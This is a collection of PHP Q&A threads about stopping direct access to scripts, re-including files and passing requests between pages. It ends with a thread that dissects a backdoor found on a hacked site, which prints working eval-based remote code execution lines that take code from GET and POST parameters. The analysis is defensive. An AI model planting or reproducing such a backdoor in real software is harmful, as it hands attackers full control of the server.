Allow window.location but prevent direct access to a PHP file - php

I have a script file named script.php which is accessed from another PHP file called main.php through the JavaScript "window.location" command. I want to prevent direct access to the file, i.e., no one should be able to type script.php into the URL bar and view the output of the file. But I want my main.php to be able to redirect to script.php using window.location. Is there any way to do this?
I have tried using debug_backtrace() and preg_match(), but these also block the window.location redirect coming from main.php. Any way to get around this?

I'm not really sure what you want to do, or why. There is no way to allow only one script to open a URL, because the browser handles the request either way.
Normally you check inside the file itself whether the user is allowed to use it. So you need some logic that tells your script whether the user should see it; otherwise you can take some other action, like displaying an error or redirecting back to your main.php.
Just some quick ideas ...
Idea 1.) If possible, include() the script.php in main.php and block direct access via .htaccess. Then you don't need a redirect and no one can access it directly.
Idea 2.) Set a session variable in main.php, like $_SESSION["allow"] = true;, and check it again in script.php. Afterwards set the value to false, so the next call will fail.
Idea 3.) Add a parameter to the file call, like script.php?allow=true. But in this case, all users who know the parameter could call it.
Idea 4.) Add a custom parameter to the redirect which is only valid for a given time. To keep it simple, something like PHP's time(). Check whether the parameter is within a short time limit. In this case the redirect URL has to be generated right when main.php starts the redirect; otherwise the request could already be too old.
Those are my ideas. I hope something gives you a hint how to do it.
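Ideas 2 and 4 combine naturally into a one-time, time-limited session flag. Below is a minimal sketch under that assumption; the file names (main.php, script.php) come from the question, and the session key and time limit are illustrative:

```php
<?php
// A sketch of Ideas 2 and 4 combined; key name and max age are illustrative.
// main.php sets a timestamp in the session just before the redirect:
//     session_start();
//     $_SESSION['allow_time'] = time();
//     // ...then emits: <script>window.location = 'script.php';</script>

// script.php calls this: the flag must exist and be recent, and it is
// cleared immediately so it can only be used once.
function consume_allow_flag(array &$session, int $now, int $max_age = 5): bool
{
    $fresh = isset($session['allow_time'])
          && ($now - $session['allow_time']) <= $max_age;
    unset($session['allow_time']); // one-time use: a second call fails
    return $fresh;
}

// In script.php:
//     session_start();
//     if (!consume_allow_flag($_SESSION, time())) {
//         header('Location: main.php'); // direct access: bounce back
//         exit;
//     }
```

Keeping the check in one function makes it easy to test, and clearing the flag before returning guarantees a refresh or a retyped URL fails even within the time window.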

Related

Include a php file twice?

I am working on a page that requires a certain PHP file to be included at runtime. However, at some point in the code below, the variable in that included file is rewritten by a remote cURL POST request, so I need to re-include the file to read the new value of the variable.
Can I "include" it again to reload the new value? Or is a double include of the same file within the same code not allowed?
EDIT:
Here's what I'm doing exactly:
include a file, that contains 1 variable
run a check in an online API to make sure the URL from the variable is not in the database
if it is, initiate a cURL POST request to a page on my second domain, that starts a chain of events there
after that chain is completed, the second page sends a cURL request to another page on my first domain; that request contains another URL, which the receiving page grabs and uses to overwrite the initially included file with the new value for the variable
back to my initial code - I now have a new value for that previously included variable, so I need to "reload" it somehow, because I will be using it a bit later in the code of the same page; won't re-including the file be best?
I think you should move the "later part" of the code in your first PHP file to the file that overwrites your initial variable in #4. Or else move that code to a new PHP file altogether.
You can also implement a web-hook kind of system where you'd pass the "variable" to the first code as a GET/POST parameter. So, the first time that code gets called it will check for the variable. If empty, then it does what you mentioned in steps 1-4.
Then step #4 calls that PHP code again, but passing a variable value. Hence, instead of executing the first part of the code, the file executes the later part.
In any event, your code seems to be too convoluted, and it is best to split it into functions and classes or something.
I ended up using the following:
$newly_updated_file = "file_with_variable.php";
$lines = file($newly_updated_file);
$new_variable = $lines[15]; // file() is zero-indexed, so this reads line 16
Ought to do fine.
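For the record, a double include of the same file is allowed: include (unlike include_once) re-executes the file every time, so simply re-including it picks up the rewritten value. A self-contained sketch, with an illustrative file name and variable:

```php
<?php
// include (unlike include_once) re-executes the file every time, so a
// value rewritten on disk is picked up on re-include.
$file = sys_get_temp_dir() . '/file_with_variable.php';

file_put_contents($file, '<?php $remote_url = "http://old.example";');
include $file;
$first = $remote_url;

// ...meanwhile the cURL chain overwrites the file with a new value...
file_put_contents($file, '<?php $remote_url = "http://new.example";');
include $file;            // second include re-reads the new value
$second = $remote_url;

unlink($file);
echo $first, "\n", $second, "\n"; // http://old.example, then http://new.example
```

This also avoids the fragility of reading a fixed line number out of the file with file().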

PHP how to pass `http request` object from one PHP file to another PHP file

Usually, when I want to redirect from one PHP page to another page of the same project, I use
header("location:somepage.php");
This causes extra round trips between client and server. What I want to do instead of sending a redirect header is to stop execution of the requested page and pass the request object, or the request information, to the page I want to redirect to. That way a single request is enough. I believe this kind of functionality is available in JSP. Is the same thing available in PHP?
As @DanSherwin commented, you probably want to use include. You might do something like this:
firstpage.php:
if (/* some condition when you want to do a redirect */) {
    include 'somepage.php';
    exit;
}
This runs the code from somepage.php immediately, as though it were cut and pasted into firstpage.php**, and then it exits right afterward as though you had redirected away from firstpage.php.
** caveat: watch out for variable scope.
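The reason this answers the original question is that the include()d page sees the exact same request data; nothing has to be passed along. A sketch (file names follow the answer above; the request data is simulated so the snippet runs from the CLI):

```php
<?php
// An include()d page shares the including page's $_GET, $_POST and local
// variables, so no second HTTP request is needed to hand over the request.
$somepage = sys_get_temp_dir() . '/somepage.php';
file_put_contents($somepage, '<?php echo "id=", $_GET["id"], " user=", $user;');

$_GET['id'] = '42';   // simulating the original request from the CLI
$user = 'alice';

ob_start();
include $somepage;    // firstpage.php would do this instead of header()
$out = ob_get_clean();
unlink($somepage);

echo $out, "\n";      // id=42 user=alice
```

That shared scope is both the feature and the caveat: any variable firstpage.php has already set is visible inside somepage.php, and vice versa.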

Prevent direct access using the define and defined function in PHP

I'm trying to use the define function and the defined function in order to avoid hotlinking / direct accessing a PHP script but for some reason it will not work.
The issue I'm having is that it simply will not work: I receive the "Hotlinking is not allowed" message even if I visit index.php first and follow the link and/or the post form.
Here is an example of what I'm trying to do:
index.php
<?php
define("ACCEPT",TRUE);
?>
<html>
...
core.php
<?php
if (defined('ACCEPT'))
{
    // ACCEPT is defined, which means the user came here via index.php
}
else
{
    // The user is most likely accessing core.php directly, abort.
    echo "Hotlinking is not allowed";
    exit;
}
Please note that the post "Preventing Direct Access, is it possible to spoof a php define?" does not answer my question nor does the post "define and defined for disallow direct access".
This is what a fair amount of programs do. Just create a header that checks for the definition and redirects/exits if it isn't defined. Note that this only works when core.php is include()d by index.php within the same request: a constant defined in index.php does not survive into a separate request, so following a link from index.php to core.php will not keep ACCEPT defined. There is nothing wrong with doing it this way, but it adds to the amount of code each page needs. It can be confusing because the define needs to be in one place, and the requested page has to either be included, or include the page that has the define. It is all about structure.
Here is something you can do:
.htaccess - redirects every request to index.php
index.php - Defines a variable, acts as a router that fetches/includes the page to be shown based on request data.
childpage.php - checks if variable exists (meaning it was included) and then does whatever needs to be done.
The other option is to place the sensitive code in an .htaccess-protected directory.
You can use a framework as well that does a lot of this.
Or, if your host allows you to edit your vhost config (which they probably won't if you only have access to a public directory), you can change the document root to a higher directory.
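The router layout described above can be sketched in a few lines. File and constant names here are illustrative; index.php is the single entry point (with .htaccess rewriting every request to it) and includes the child page within the same request, which is why the constant is visible there:

```php
<?php
// index.php — the router defines a constant, then includes the child page.
define('IN_APP', true);

// childpage.php — written to a temp file only to keep this sketch
// self-contained; normally it is an ordinary file in your project.
$child = sys_get_temp_dir() . '/childpage.php';
file_put_contents($child, <<<'PHP'
<?php
if (!defined('IN_APP')) {      // reached directly, not through the router
    exit('Direct access not allowed');
}
echo "page content";
PHP
);

ob_start();
include $child;                // via the router: IN_APP is defined
$out = ob_get_clean();
unlink($child);

echo $out, "\n";               // page content
```

Requested directly, childpage.php would exit at the defined() check, because no separate request ever passes through index.php's define().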

Is there a way to prevent the post from being viewed by the visitor?

Suppose the page is example.com/blog/data.php. I am using file_get_contents to get the content in another script page. Now, I want to:
Forbid google search to crawl and index the data.php page.
Forbid the visitor to access it
Is there a way to achieve this?
You can redirect to another page if the request URL is example.com/blog/data.php, but a far easier and more logical solution would be to move the file out of your web root.
Edit: If you really want to keep the file inside the web-root, you can use something like this at the top of the script that you don't want to access directly:
if ($_SERVER['REQUEST_URI'] === $_SERVER['SCRIPT_NAME'])
{
    header('Location: /'); // redirect to home page
    exit;                  // stop the script; header() alone does not
}
However, this will probably not work in combination with file_get_contents (you would need to strip these lines from the result); you could include the file instead.
Don't put data.php under the web root. Keep it in a parallel directory.
You can pass a token via GET. Overall, your approach is slightly wrong. Why don't you incorporate the data.php logic into the script that calls it?
Simply apply access restriction for authorized users only. The simplest way is to access your page with a URL parameter as a password:
example.com/blog/data.php?secret=someblah
and at the top of your file data.php do the following:
<?php
if (!isset($_GET['secret']) || $_GET['secret'] != 'someblah') exit();
?>
However, it is recommended not to use this from a public computer because it is not secure; it is just a primitive authentication principle.
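If you do go this route, a slightly safer variant of the check above is to compare with hash_equals() (constant-time, and no loose type juggling like !=). A sketch, with the secret value kept illustrative:

```php
<?php
// Constant-time comparison of a request-supplied secret against the
// expected value; 'someblah' is the example secret from the answer.
function secret_ok(?string $given, string $expected): bool
{
    return $given !== null && hash_equals($expected, $given);
}

// In data.php:
//     if (!secret_ok($_GET['secret'] ?? null, 'someblah')) exit();

var_dump(secret_ok('someblah', 'someblah')); // bool(true)
var_dump(secret_ok('wrong', 'someblah'));    // bool(false)
var_dump(secret_ok(null, 'someblah'));       // bool(false)
```

Bear in mind that a secret in a GET parameter still ends up in server logs and browser history, which is part of why moving the file out of the web root is the better answer.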

hacked website unusual php file

I have a file called q.php that has appeared on one of my websites. The site has been hacked. Does anyone know what the file does?
<? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute PHP code passed in as a 'q' parameter in a GET request, or any code in the 'eval' param of a POST request. It suppresses all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advise you to clean up your server and start again from a clean installation.
It will enable the attacker to execute any code.
If you pass code to that script, either by ?q=code in the URL or by including it in the eval parameter of a POST request, it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server, by passing it in the URL or POST data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file, and any other files with rogue code in them, does not fix the problem, which is that attackers are somehow able to upload files into your website's file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets error reporting to off.
2/ if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }
When the URL is called with ?wpth on the end, the path ./mywebsite.co.uk/index.htm is echoed at the top of the page.
3/ eval(@$_GET['q']);
This will execute any code included in the value of q, e.g. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kills the page execution if a POST form variable called eval is not set.
5/ eval($_POST['eval']);
Executes any code posted from a remotely hosted form where the form variable is called eval.
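As part of the audit the answers recommend, it can help to sweep the web root for more files of this family. A rough first-pass sketch; the pattern and sample are illustrative, and real malware is often obfuscated, so treat this as a triage aid, not a complete audit:

```php
<?php
// Flags PHP source that feeds request data straight into eval(), the
// signature of the backdoor dissected above.
function looks_like_backdoor(string $source): bool
{
    return (bool) preg_match(
        '/\beval\s*\(\s*@?\$_(GET|POST|REQUEST|COOKIE)\b/i',
        $source
    );
}

var_dump(looks_like_backdoor('<?=eval(@$_GET[\'q\']);?>')); // bool(true)
var_dump(looks_like_backdoor('<?php echo "hello";'));       // bool(false)
```

Running this over every .php file (for example via RecursiveDirectoryIterator) surfaces the obvious copies, but a clean reinstall remains the only reliable fix.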
